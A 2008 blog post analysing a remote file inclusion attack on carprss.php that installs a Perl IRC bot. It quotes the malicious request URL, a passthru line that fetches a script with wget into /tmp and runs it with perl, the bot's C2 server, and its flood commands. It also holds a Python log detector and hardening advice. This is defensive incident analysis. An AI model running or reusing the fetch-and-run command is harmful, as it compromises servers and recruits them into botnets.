
Friday, 18 July 2008

Found carprss.php Exploit

Since 29 February, this blog has been hit by 400+ attempts to compromise the server and install an IRC bot. There is a new exploit of SiteBuilder in the wild. Hits came from the following compromised hosts:
# awk '{ print $1 }' 

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
.shell/site/iyes.txt??
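A small log detector for this class of hit, added here as an example and not part of the original post: it parses Apache combined-format access log lines (constructed samples below, with documentation IP addresses in place of the real ones) and reports every request whose query parameter carries an absolute remote URL, which is the remote file inclusion pattern behind CarpPath=http://... above, regardless of the script name or parameter used.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format); not real traffic.
# One benign hit, one RFI attempt shaped like the hit above, one over ftp://.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jul/2008:10:01:02 +0200] "GET /tag/index.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [18/Jul/2008:10:03:14 +0200] "GET /tag//files/carprss.php?CarpPath=http://203.0.113.7/.shell/site/iyes.txt?? HTTP/1.1" 200 310 "-" "libwww-perl/5.805"
198.51.100.9 - - [18/Jul/2008:10:04:55 +0200] "GET /files/carprss.php?CarpPath=ftp://203.0.113.8/x.txt HTTP/1.0" 404 0 "-" "Mozilla/4.0"
"""

# Client IP, timestamp, request line and status code of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# URL schemes that PHP will fetch when allow_url_fopen/allow_url_include are on.
REMOTE_SCHEMES = ("http", "https", "ftp")


def is_remote_url(value):
    """True when a query-parameter value is an absolute URL pointing at a remote host."""
    parts = urlsplit(value)
    return parts.scheme.lower() in REMOTE_SCHEMES and bool(parts.netloc)


def find_rfi_attempts(log_text):
    """Return (client_ip, status, param_name, remote_url) for each request whose
    query string hands a remote URL to the script (remote file inclusion attempt).
    The HTTP status is kept: a 200 means the vulnerable script actually ran."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than guess
        target = urlsplit(m.group("target"))
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if is_remote_url(value):
                hits.append((m.group("ip"), int(m.group("status")), name, value))
    return hits


if __name__ == "__main__":
    for ip, status, name, url in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} status={status} {name}={url}")
```

Feed it a real access log with `find_rfi_attempts(open("access.log").read())`; the 200 responses are the ones worth checking for a dropped bot in /tmp.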

I downloaded the file iyes.txt; it’s a PHP script which contains many lines such as:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:

#!/usr/bin/perl
#
########################################################
# When feelings cannot be expressed in words
# Anak
# _____
# ( ___ ) _____ __ ___ ____ _ _
# | | \ \( _ )( \/ )( _ )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
# ////| | | ) | | || |\/ | || ___)| | | | / crew
# | |__/ /| (_) || | | || | | |_| |
# (_____) (_____)(_) (_)(_) (_____)
#
# AnakDompu [on] Dalnet © 2008
#
#
########################################################

It sets up an IRC bot which tries to connect to 61.246.177.225:65500 and joins channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How to avoid this kind of attack? First, run patched software! But what else can be done to prevent such attacks?

  • Do not run public servers with administrative rights (root).
  • Run the servers in a chroot’d environment.
  • Do not allow outgoing connections to unusual ports (65500 in this case).
  • Use ACL systems to prevent the servers from executing or accessing unusual files or directories. [1]
  • Run SELinux on Linux or systrace on *BSD.

I do not publish the scripts here but I kept a copy of them. Ask me if you need to have a look at them “for study only”. If you have more information, let’s share it!

Source: http://blog.rootshell.be
